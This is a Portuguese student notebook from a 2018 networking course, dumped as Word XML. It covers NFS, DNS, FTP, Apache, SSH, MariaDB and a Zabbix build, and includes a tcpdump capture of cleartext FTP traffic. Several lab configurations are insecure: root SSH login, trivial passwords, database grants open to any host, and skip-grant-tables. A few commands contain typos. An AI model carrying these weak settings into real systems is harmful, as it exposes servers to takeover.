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CADERNO DE ANOTAÇÕES</w:t>
      </w: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CURSO TÉCNICO DE REDES DE COMPUTADORES</w:t>
      </w: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2018</w:t>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:line="360"/>
        <w:ind w:right="0" w:left="0" w:firstLine="0"/>
        <w:jc w:val="center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PREPARAÇÃO DO AMBIENTE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ACESSO NFS AO REPOSITÓRIO LOCAL – DEBIAN 8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showmount -e 10.107.132.20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/mnbt/repo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mount -t nfs 10.107.132.20:/home/celso/FTP/Linux/Debian87 /mnt/repo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ls -l /mnt/repo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seq 3 | xargs -I@ echo deb file:/mnt/repo/blu@ jessie main contrib &gt; /etc/apt/sources.list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update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[program]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ACESSO NFS AO REPOSITÓRIO LOCAL – DEBIAN 9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showmount –e 10.107.132.20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/mnt/repo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mount –t nfs –o nfsvers=3 10.107.132.20:/home/celso/FTP /mnt/repo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ls /mnt/repo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/mnt/share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/mnt/share/blu1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/mnt/share/blu2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/mnt/share/blu3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mount –t iso9660 –o loop,ro /mnt/repo/debian-9.3.0-amd64-BD-1.iso /mnt/share/blu1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mount –t iso9660 –o loop,ro /mnt/repo/debian-9.3.0-amd64-BD-2.iso /mnt/share/blu2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mount –t iso9660 –o loop,ro /mnt/repo/debian-9.3.0-amd64-BD-3.iso /mnt/share/blu3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ls –l /mnt/share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seq 3 | xargs –I@ echo deb [trusted=yes]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file:/mnt/share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/blu@ stretch main contrib &gt; /etc/apt/sources.list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update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[program]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INSTALAR INTERFACE GRÁFICA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xorg fluxbox wireshark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startx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no terminal shell bash: wireshark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analyze - display filters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capture - options - habilitar só a enp0s3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filtrar só o ftp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ACESSO REMOTO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enviar arquivo/ copiar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[nome do arquivo] [destino] -&gt; scp [name_archive] r3m@10.107.132.20:/home/r3m/script01/tiffany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[nome do arquivo] [destino] -&gt; scp se* r3m@10.107.132.20:/home/r3m/script01/tiffany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ssh [usuário]@[IP] '[comando]'  -&gt;ssh r3m@10.107.132.20 'mkdir /home/r3m/script02/tiffany'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CÓDIGO DE CORES HTML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www.cultura.ufpa.br/dicas/htm/htm-cor2.htm</w:t>
        </w:r>
      </w:hyperlink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MONTAGEM DE PENDRIVE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fdisk -l ou lsblk ou blkid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/media/usb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mount /dev/sdb1 /media/usb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umount /media/usb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ENCONTRAR ARQUIVOS NO LINUX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find / -iname &lt;archive/directory name&gt;</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">//iname=ignorar maiúsculas e minúsculas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find / -name &lt;archive/directory name&gt;</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">//name=nome exato do arquivo ou diretório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SERVIÇOS PARA INTERNET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TCPDUMB -SNIFFER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tcpdumb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sniffer [ftp=21] [ssh=22] [telnet=23]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tcpdumb -vvv -nAs0 -i enp0s3 port 21 &gt;&gt; captura.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="360"/>
        <w:ind w:right="0" w:left="0" w:firstLine="708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&gt; olhar o arquivo</w:t>
      </w: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captura.txt para ver os pacotes capturados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apt-get install xorg fluxbox wireshark</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="360"/>
        <w:ind w:right="0" w:left="0" w:firstLine="708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CONFIGURAR O MODO ANÔNIMO NO FTP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proftpd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nano /etc/proftpd/proftpd.conf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tirar o comentário da linha 149-188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salvar e sair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/etc/init.d/proftpd restart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/srv/ftp (home do usuário anônimo)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cat welcome.msg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apagar tudo e escrever msg de boa vindas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&gt; salvar e sair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CONFIGURAR O FTP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apt-get install proftpd-basic proftpd-doc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/etc/proftpd/proftpd.conf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linha 11 desabilitar o ipv6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linha 15 colocar no o nome do host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linha 18 estar em standalone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DisplayConnect /usr/local/etc/proftpd.banner (arquivo de boas vindas) -&gt; adicionar na última linha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service proftpd restart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/etc/hosts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127.0.1.1 e o nome do host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Para "enjaular" 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/etc/proftpd/proftpd.conf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linha 36 -&gt; descomentar e escrever DefaultRoot </w:t>
        <w:tab/>
        <w:t xml:space="preserve">~/ftp -&gt; para ter somente acesso a home do usúario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service proftpd restart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criar o diretorio ftp na home do usúario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configurar ftp para acesso anonimo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linha 149 -&gt; configuração de usúario anônimo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.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Descomentar tudo (somente a primeira hastag)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.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linha 188 -&gt; fim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ACESSO SEGURO AO FTP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sftp -P 2222 aluno@192.168.0.114 (logar no servidor)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love o boy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DNS – DOMAIN NAME SYSTEM</w:t>
        <w:tab/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Tipos de DNS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="120" w:line="36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Resolver</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="120" w:line="36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Recursivo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="120" w:line="360"/>
        <w:ind w:right="0" w:left="720" w:hanging="36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Atoritativo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Domínio raiz = representado por um “.”.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CCTLD – Country Top Level Domain – ar, br, co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GTLD – Generic Top Level Domain – com, org, gov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INSTALAR DNS PRIMÁRIO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bind9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/etc/bind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less db.root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#arquivo dos 13 endereços ip root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less named.conf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#arquivo que é uma junção de todos os outros do /etc/bind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named.conf.local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Do any local configuration here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Consider adding the 1918 zones here, if they are not used in your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organization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//include "/etc/bind/zones.rfc1918";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//Zona Maranhão [Apenas para testar]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zone "maranhao.com.br" {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type master;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file "/etc/bind/db.maranhao.com.br";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:wq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cp db.empty db.maranha.com.br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#db.empy = arquivo vazio para configuração de zonas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$TTL    86400</w:t>
        <w:tab/>
        <w:t xml:space="preserve">#Tempo que a informação do domínio vai ficar armazenado no cache do cliente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       IN      SOA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ns1. maranhão.com.br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. root.localhost ( </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">@ = inicío de configuração para o bind; IN = domínio de internet; S0A = autoritativo do domínio; ns1 = name server 1 (primário); root.localhost =e endereço de e-mail.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2018031901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  ; Serial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604800         ; Refresh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86400         ; Retry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2419200         ; Expire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86400 )       ; Negative Cache TTL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       IN      NS      ns1.maranha.com.br.</w:t>
        <w:tab/>
        <w:t xml:space="preserve">#NS = name server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       IN      MX 10   mail1.maranhao.com.br.</w:t>
        <w:tab/>
        <w:t xml:space="preserve"># MX = sigla para servidor de email; 10 = 01</w:t>
        <w:tab/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ns1     IN      A       192.168.0.14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www     IN      CNAME   ns1</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">#Toda vez que www for digitado ele será substituído por ns1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ftp     IN      A       196.168.0.14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mail1   IN      A       192.168.0.14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:wq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systemctl restart bind9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ping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www.maranhao.com.br</w:t>
        </w:r>
      </w:hyperlink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rm /etc/resolv.conf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ping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www.maranhao.com.br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INSTALAR DNS SECUNDÁRIO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bind9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/etc/bind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slave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named.conf.local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Do any local configuration here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Consider adding the 1918 zones here, if they are not used in your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 organization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//include "/etc/bind/zones.rfc1918";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//Zona Tiffany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zone "tiffany.com.br" {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type slave;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file "/etc/bind/db.tiffany.com.br";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masters {192.168.0.114; };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service bind9 restart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(No servidor primário)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/etc/bind/named.conf.local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//Zona Tiffany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zone " tiffany.com.br " {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type master;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8"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">allow-transfer { 192.168.0.114; };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       file "/etc/bind/db.tiffany.com.br ";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:wq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(No servidor secundário)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service bind9 restart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CONFIGURAÇÃO DO CLIENTE DNS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vi /etc/resolv.conf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nameserver 192.168.0.14 (server IP)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:wq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CONFIGURAÇÃO DO SERVIDOR RAIZ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bind9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/etc/named.conf.local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zone "." {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type máster;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file "/etc/bind/db.raiz";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:wq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aluno@192.168.0.254:/etc/bind/*.op* /etc/bind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aluno@192.168.0.254:/etc/bind/db.root /etc/bind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INSTALAR SERVIDOR WEB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apache2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/etc/resolve.conf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nameserver 192.168.0.33</w:t>
        <w:tab/>
        <w:t xml:space="preserve">#configurar o web server para integrá-lo ao sistema DNS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no servidor primário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/home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db.tiffany.com.br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www</w:t>
        <w:tab/>
        <w:t xml:space="preserve">IN</w:t>
        <w:tab/>
        <w:t xml:space="preserve">A</w:t>
        <w:tab/>
        <w:t xml:space="preserve">[web server IP] </w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">//comando para adicionar o web server ao sistema DNS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/etc/init.d/bind9 restart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no servidor web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/etc/apache2/sites-available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tiffany.conf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&lt;VirtualHost *:80&gt;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ServerName </w:t>
      </w:r>
      <w:hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="docRId4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www.tiffany.com.br</w:t>
        </w:r>
      </w:hyperlink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//adicionar mais de um domínio no mesmo servidor web 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DocumentRoot /var/www/tiffany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&lt;/VirtualHost&gt;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panegalli.conf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&lt;VirtualHost *:80&gt;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ServerName </w:t>
      </w:r>
      <w:hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="docRId5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www.panegalli.com.br</w:t>
        </w:r>
      </w:hyperlink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DocumentRoot /var/www/vi </w:t>
        <w:tab/>
        <w:t xml:space="preserve">//diretório para armazenar as páginas html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&lt;/VirtualHost&gt;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/var/www/tiffany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mkdir /var/www/panegalli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/etc/apache2/sites-available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a2ensite tiffany.conf</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">//a2=apache2; en=enable; site - habilitar o site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a2ensite panegalli.cong</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">//www.tiffany.com.br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cd /var/www/tiffany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 index.html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&lt;!--Aceita caracteres fora da tabela ASC; vai usar o padrão de configuração utf8 (língua brasileira)--&gt;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&lt;meta charset="utf-8" /&gt;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&lt;head&gt;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&lt;title&gt; Janela 1 &lt;/title&gt;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&lt;/head&gt;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&lt;body&gt;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&lt;center&gt;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&lt;h1&gt; &lt;font color="#00BFFF"&gt;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site da Tiffany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&lt;/h1&gt;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&lt;/center&gt;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&lt;/body&gt;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cp ../panegalli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&lt;!--Aceita caracteres fora da tabela ASC; vai usar o padrão de configuração utf8 (língua brasileira)--&gt;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&lt;meta charset="utf-8" /&gt;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&lt;head&gt;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&lt;title&gt; Janela 1 &lt;/title&gt;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&lt;/head&gt;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&lt;body&gt;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&lt;center&gt;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&lt;h1&gt; &lt;font color="#9400D3"&gt;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site da Panegalli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&lt;/h1&gt;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&lt;/center&gt;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&lt;/body&gt;</w:t>
      </w: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5B9BD5"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">ACESSAR UM SERVIDOR VIA SSH SEM SENHA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apt-get install openssh-server -y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Editar o arquivo /etc/ssh/sshd_config -&gt; servidor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Port 22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#ListenAddress ::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ListenAddress x.x.x.x (ip do servidor)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PermitRootLogin yes</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">//opcional: logar pelo root via ssh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service ssh restart -&gt; reinicia o arquivo de configuração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service ssh status -&gt; verifica o status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Gerar um par de chave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ssh-keygen -t rsa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enter ou caminho escolhido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enter ou senha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enter ou senha digitada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copiar chave pública no servidor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ssh-copy-id aluno@x.x.x.x(ip do servidor de destino - para onde a chave será copiada)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ssh user@ip_whither_server (acessar o servidor)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Tipos de acessos ssh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ssh usuario@ip -p porta (SE FOR UMA PORTA DIFERENTE)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origem(ip):/diretorio destino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-P nº da porta origem(ip):/diretorio destino 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scp -r origem:caminho_dir destino (copia tudo do destino)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1416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INFRAESTRUTURA DE REDES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AUTOCAD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COMANDOS BÁSICOS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F8 - modo ortogonal - linhas horizontais e verticais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F9 - modo de precisão - só permite desenhar nas intersecções dos quadriláteros de fundo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F7 - ativas/desativar linhas de grade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offset - duplica linha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COORDENADA CARTESIANA RELATIVA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comando line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@coordenada x,coordenada y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@3,3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COORDENADA POLAR RELATIVA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comando line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@distância&lt;ângulo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@13&lt;23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DIMENSÕES ARQUITETÔNICAS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Parede externa - 0.25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Parede interna - 0.15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largura de porta - 0.90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MUDAR COTA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&gt; anottation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&gt; Manage Dimension Style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&gt; New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AS BUILT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Definição de rotas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Dimensionamento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Orçamentos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Lista de materiais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Mão de obra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Custos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Diagrama Unifilar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Plano de face do rack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Plantas baixas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Fotos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Atas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Certificação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Memorial Descritivo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As Built: Documento que facilita o troubleshooting e inserção de novos ativos de rede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Passo 1 - Construir o cabeçalho do documento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Nome da empresa prestadora de serviço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Título do documento, exemplo: documento de "As Built" do ambiente LAN Corporativa de Voz e Dados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Logotipo da empresa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Número de revisão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Data de conclusão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Autor, contato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Assinatura dos integrantes da solução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Passo 2 - Histórico de versões do documento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Passo 3 - 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Passo 4 - Criar inventário de hardware e software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Nome do equipamento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Número de série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MAC Address, caso seja necessário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Modelo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Versão do firmware e Sistemas Operacionais dos equipamentos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Fabricante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Endereços IP atribuídos</w:t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ABR 1994 NBR 6492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Projetos arquitetônicos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Carimnbo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O carimbo inferior direito das folhas de desenho deve ser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reservado ao carimbo destinado à legenda de titulação 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numeração  dos  desenhos.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4.3.1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Devem constar da legenda, no mínimo, as seguintes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informações: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a) identificação  da  empresa  e  do  profissional  res-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ponsável  pelo  projeto;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b) identificação  do  cliente,  nome  do  projeto  ou  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empreendimento;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c ) título do desenho;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d) indicação  seqüencial  do  projeto  (números  ou  le-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tras);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e) escalas;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f)  data;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g) autoria do desenho e do projeto;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h) indicação  de  revisão.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Exemplar para uso exclusivo - SERVIÇO NACIONAL DE APRENDIZAGEM INDUSTRIAL - SENAIDN - 33.564.543/0001-90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Impresso por: SP - ALUNO DO SENAI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SERVIÇO NACIONAL DE APRENDIZAGEM INDUSTRIAL - SENAI-SP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NBR 6492/1994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4.3.2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Outras informações devem localizar-se próximo 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carimbo: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a)  planta-chave;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b)  escalas  gráficas;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c)  descrição  da  revisão;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d)  convenções  gráficas;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e) notas gerais;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f)  desenhos  de  referência.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4.3.3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  Indicação  do  norte,  regime  de  ventos,  etc.  podem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FFFFFF" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">também  constar  próximo  do  carimbo</w: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object w:dxaOrig="8840" w:dyaOrig="2568">
          <v:rect xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml" id="rectole0000000000" style="width:442.000000pt;height:12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591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699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699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699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7699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7699" w:leader="none"/>
        </w:tabs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Máximo de comprimento: 18,5cm.</w:t>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3591" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="12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GERENCIAMENTO DE REDES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BANCO DE DADOS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SGBD - Sistema de Gerenciamento de Banco de Dados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Oracle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MySQL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Maria DB (fork do MySQL)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PostgreSQL (OpenSource)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SQLServer (Microsoft)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Fire Bird (OpenSource)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SQL - Structured Query Language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NonSQL - não trabalha com a linguagem SQL. Trabalha com uma linguagem funcional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* Mongo DB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MARIA DB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mysql-server ou apt install mariadb-server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mysql -u root -p</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">//u:usuario, -p:password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mysql</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">//entrar no banco de dados pelo debian9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exit</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/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SETAR SENHA NO MYSQL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 password for 'root'@'localhost' = password('mysql');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update mysql.user set authentication_string = password('mysql') where user = 'root' and host = 'localhost';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update mysql.user set plugin = '' where user = 'root' and host = 'localhost';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flush privileges;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REDEFINIR SENHA DO MYSQL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/etc/init.d/mysql stop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mysqld_safe --skip-grant-tables &amp;</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">//modo de segurança do banco de dados; &amp;=entrar em segundo plano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COMANDOS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comandos principais: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insert;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delete;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update;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select;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show databases;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create database db_teste;</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">//criar banco de dados chamado "db_teste"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GRANT ALL PRIVILEGES ON db_empresa.* TO 'aluno'@'%' IDENTIFIED BY '123'; //criar o usuário e dar privilégios no banco</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="360"/>
        <w:ind w:right="0" w:left="9923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 dados db_empresa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 teste;</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">//usar o banco de dados teste;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MariaDB [teste]show tables;</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">//mostrar tabelas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MariaDB [teste]create table Funcionarios ( </w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">//criar tabela FUNCIONARIOS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#Após apertar enter segue as linhas abaixo :</w:t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-&gt; id int primary key auto_increment,</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">//variável id do tipo inteiro que se auto-incrementa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-&gt; nome varchar(100) not null, </w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">//varchar=var charactere; not null = não nulo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-&gt; cargo varchar(100) not null,</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">//como não tem nada é um campo null = pode ser nulo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-&gt; salario double not null,</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">//double=variável real que suporta números grandes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-&gt; endereco varchar(200) null,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-&gt; telefone varchar(16) null);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MariaDB [teste]desc FUNCIONARIOS</w:t>
        <w:tab/>
        <w:t xml:space="preserve">;</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">//describe a table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MariaDB [teste]insert into FUNCIONARIOS (nome, cargo, salario) values ('Nikola Tesla', 'Cientista', 20000.50);</w:t>
        <w:tab/>
        <w:t xml:space="preserve">//inserir dados em uma tabela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MariaDB [teste]select * from FUNCIONARIOS;</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">//Retornar tudo da tabela FUNCIONARIOS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select * from Funcionarios where cargo='Gerente de RH';    //Buscar algo especifico ta tabela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update FUNCIONARIOS set cargo = 'Lider' where id = 1;</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">//Modificar o cargo do funcionário com id=1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delete from FUNCIONARIOS where id = 1;</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">//deletar a linha com id = 1 da tabela FUNCIONARIOS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80"/>
        <w:gridCol w:w="2460"/>
        <w:gridCol w:w="1404"/>
        <w:gridCol w:w="1272"/>
      </w:tblGrid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nome</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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cargo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salario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Nikola Tesla</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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Cientista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20000.5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Tiffany Panegalli</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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CisAdmin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35000.75</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1" w:hRule="atLeast"/>
          <w:jc w:val="left"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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Michel Faraday  </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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Fisico</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12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4"/>
                <w:shd w:fill="auto" w:val="clear"/>
              </w:rPr>
              <w:t xml:space="preserve">20000.5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drop table FUNCIONARIOS;</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">//apagar tabela FUNCIONARIOS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drop database teste;</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">//apagar um banco de dados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INSTALAÇÃO DO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1. Debian 9.3 com MariaDB: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build-essential snmp vim libssh2-1-dev libssh2-1 libopenipmi-dev libevent* libpcre* -y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libsnmp-dev wget libcurl4-gnutls-dev fping libxml2 libxml2-dev curl libcurl3-gnutls -y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libcurl3-gnutls-dev libiksemel-dev libiksemel-utils libiksemel3 -y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apache2 php7.0 php7.0-mysql libapache2-mod-php7.0 php7.0-gd libpq5 libpq-dev mysql-server mysql-client libmariadbd-dev -y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php-bcmath php-mbstring php-ldap php-xml php-xmlreader php-xmlwriter -y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2. Criando o banco de dados no MySQL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mysql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MariaDB [(none)]&gt; create database zabbix character set utf8;</w:t>
        <w:tab/>
        <w:t xml:space="preserve">//criação de banco de dados com suporte à tabela de decodificação utf8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MariaDB [(none)]&gt; GRANT ALL PRIVILEGES ON *.* TO zabbix@localhost IDENTIFIED BY 'zabbix' WITH GRANT OPTION;</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">//fornecer todos os privilégios para o usuário zabbix, desde que ele esteja no próprio host onde está instalado o banco de dados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MariaDB [(none)]&gt; quit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3. Configurando o PHP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PHP_FILE =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vi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date.timezone = "America/Sao_Paulo"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max_execution_time = 300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max_input_time = 300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post_max_size = 16M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always_populate_raw_post_data = -1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's/;date.timezone =/date.timezone = "America\/Sao_Paulo"/g'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's/max_execution_time = 30/max_execution_time = 300/g'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's/max_input_time = 60/max_input_time = 300/g'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's/post_max_size = 8M/post_max_size = 16M/g'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's/;always_populate_raw_post_data = -1/always_populate_raw_post_data = -1/g' /etc/php/7.0/apache2/php.ini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/etc/init.d/apache2 restart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/etc/init.d/apache2 status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4. Instalando o Zabbix</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">//dpkg: instalador de pacotes (.deb); apt: gerente de dependências | tarball: instalação de pacotes por compilação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4.1. Criando usuário zabbix e descompactando tarball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adduser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[Password: zabbix]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 Baixar a última versão estável]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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consola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https://sourceforge.net/projects/zabbix/files/</w:t>
        </w:r>
      </w:hyperlink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OBS: Na oportunidade foi usada a versão: zabbix-3.4.7.tar.gz (16.3 MB)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Copiar o arquivo "zabbix-3.4.7.tar.gz" para o diretório /usr/src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cd /usr/src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tar -zxvf zabbix-3.4.7.tar.gz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chmod -R +x zabbix-3.4.7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4.2. Populando o banco de dados no MySQL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 cat zabbix-3.4.7/database/mysql/schema.sql | mysql -uzabbix -pzabbix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 cat zabbix-3.4.7/database/mysql/images.sql | mysql -uzabbix -pzabbix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 cat zabbix-3.4.7/database/mysql/data.sql | mysql -uzabbix -pzabbix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4.3. Compilando o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cd zabbix-3.4.7/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./configure --enable-server --enable-agent --with-mysql --with-jabber=/usr --with-libcurl=/usr/bin/curl-config --with-ssh2 --with-openipmi --with-libxml2 --with-net-snmp &amp;&amp; echo "Compilado"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make install &amp;&amp; echo "[Ok]"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 Configurando o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5.1. Configurando Agent Zabbix</w:t>
        <w:tab/>
        <w:tab/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OBS: Os arquivos de configuração do Zabbix ficam em /usr/local/etc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vi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PidFile=/tmp/zabbix_agentd.pid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LogFile=/tmp/zabbix_agentd.log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LogFileSize=2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DebugLevel=3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Server=127.0.0.1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ListenPort=10050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Hostname=zabbixServer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 informe o nome exato do host, do jeito que aparece no prompt de comandos antes dos símbolos “$”, “#” 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Timeout=3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PidFile=\/tmp\/zabbix_agentd.pid/PidFile=\/tmp\/zabbix_agentd.pid/g'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LogFileSize=1/LogFileSize=2/g'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DebugLevel=3/DebugLevel=3/g'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ListenPort=10050/ListenPort=10050/g'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's/Hostname=Zabbix server/Hostname=zabbixServer/g'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's/debian/zabbixServer/g' /etc/hostname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Timeout=3/Timeout=3/g' /usr/local/etc/zabbix_agentd.conf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 Mudar hostname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hostnamectl set-hostname zabbixServer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5.2. Configurando Zabbix Server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vi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ListenPort=10051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LogFile=/tmp/zabbix_server.log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LogFileSize=2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PidFile=/tmp/zabbix_server.pid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DBHost=localhost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DBName=zabbix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DBUser=zabbix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DBPassword=senha do zabbix para acessar o banco de dados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StartIPMIPollers=1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StartDiscoverers=5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Timeout=3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FpingLocation=/usr/bin/fping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ListenPort=10051/ListenPort=10051/g'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LogFileSize=1/LogFileSize=2/g'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PidFile=\/tmp\/zabbix_server.pid/PidFile=\/tmp\/zabbix_server.pid/g'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DBHost=localhost/DBHost=localhost/g'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DBPassword=/DBPassword=zabbix/g' /usr/local/etc/zabbix_server.conf</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="9313" w:leader="none"/>
        </w:tabs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StartIPMIPollers=0/StartIPMIPollers=1/g'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StartDiscoverers=1/StartDiscoverers=5/g'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's/Timeout=4/Timeout=3/g'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sed -i 's/# FpingLocation=\/usr\/sbin\/fping/FpingLocation=\/usr\/bin\/fping/g' /usr/local/etc/zabbix_server.conf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5.3. Copiando os arquivos de frontend do Zabbix para o diretório /var/www/html/zabbix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mkdir /var/www/html/zabbix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 cp -R /usr/src/zabbix-3.4.7/frontends/php/* /var/www/html/zabbix/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chown -R www-data:www-data /var/www/html/zabbix/ </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">//mudar proprietário e grupo para www-data, que é um usuário de sistema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5.4. Scripts de inicialização do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Colocando o Zabbix para iniciar automaticamente, no boot do sistema operacional, criando os scripts abaixo.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vi /etc/init.d/zabbix_server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Zabbix daemon start/stop script.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Written by Alexei Vladishev &lt;alexei.vladishev@zabbix.com&gt;.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NAME=zabbix_server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PATH=/bin:/usr/bin:/sbin:/usr/sbin:/home/zabbix/bin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DAEMON=/usr/local/sbin/${NAME}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DESC="Zabbix server daemon"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PID=/tmp/$NAME.pid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test -f $DAEMON || exit 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 -e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case "$1" in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start)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echo "Starting $DESC: $NAME"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start-stop-daemon --oknodo --start --pidfile $PID \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--exec $DAEMON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stop)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echo "Stopping $DESC: $NAME"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start-stop-daemon --oknodo --stop --pidfile $PID \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--exec $DAEMON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restart|force-reload)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$0 stop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sleep 3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$0 start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*)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N=/etc/init.d/$NAME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echo "Usage: $N {start|stop|restart|force-reload}" &gt;&amp;2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exit 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esac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exit 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vi /etc/init.d/zabbix_agentd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#!/bin/sh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#Zabbix agent start/stop script.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#Written by Alexei Vladishev &lt;alexei.vladishev@zabbix.com&gt;.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NAME=zabbix_agentd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PATH=/bin:/usr/bin:/sbin:/usr/sbin:/home/zabbix/bin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DAEMON=/usr/local/sbin/${NAME}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DESC="Zabbix agent daemon"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PID=/tmp/$NAME.pid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test -f $DAEMON || exit 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set -e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case "$1" in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start)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echo "Starting $DESC: $NAME"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start-stop-daemon --oknodo --start --pidfile $PID \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--exec $DAEMON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stop)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echo "Stopping $DESC: $NAME"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start-stop-daemon --oknodo --stop --pidfile $PID \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--exec $DAEMON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restart|force-reload)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$0 stop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sleep 3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$0 start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*)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N=/etc/init.d/$NAME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# echo "Usage: $N {start|stop|restart|force-reload}" &gt;&amp;2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echo "Usage: $N {start|stop|restart|force-reload}" &gt;&amp;2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exit 1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;;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esac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exit 0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###########################################################################################################################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5.5. Tornando os arquivos executáveis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chmod +x /etc/init.d/zabbix_server /etc/init.d/zabbix_agentd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Executando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/etc/init.d/zabbix_server start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/etc/init.d/zabbix_agentd start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5.6. Habilitando os scripts para serem executados quando o computador for ligado.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update-rc.d -f zabbix_server defaults</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">//habilitar os scripts para serem executados quando o servidor for statado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update-rc.d -f zabbix_agentd defaults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apt install rcconf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rcconf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marcar com * os serviços do zabbix (usando barra de espaço)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tab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[ok] -&gt; enter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OBS: Marcar os dois serviços "zabbix"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6. Acessando a interface web do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No browser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ServerIP/zabbix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tudo precisa estar OK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colocar senha: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 xml:space="preserve">(sempre clicar em next step e no final finish)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7. Limpando a instalação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rm -rf /usr/src/zabbix*</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
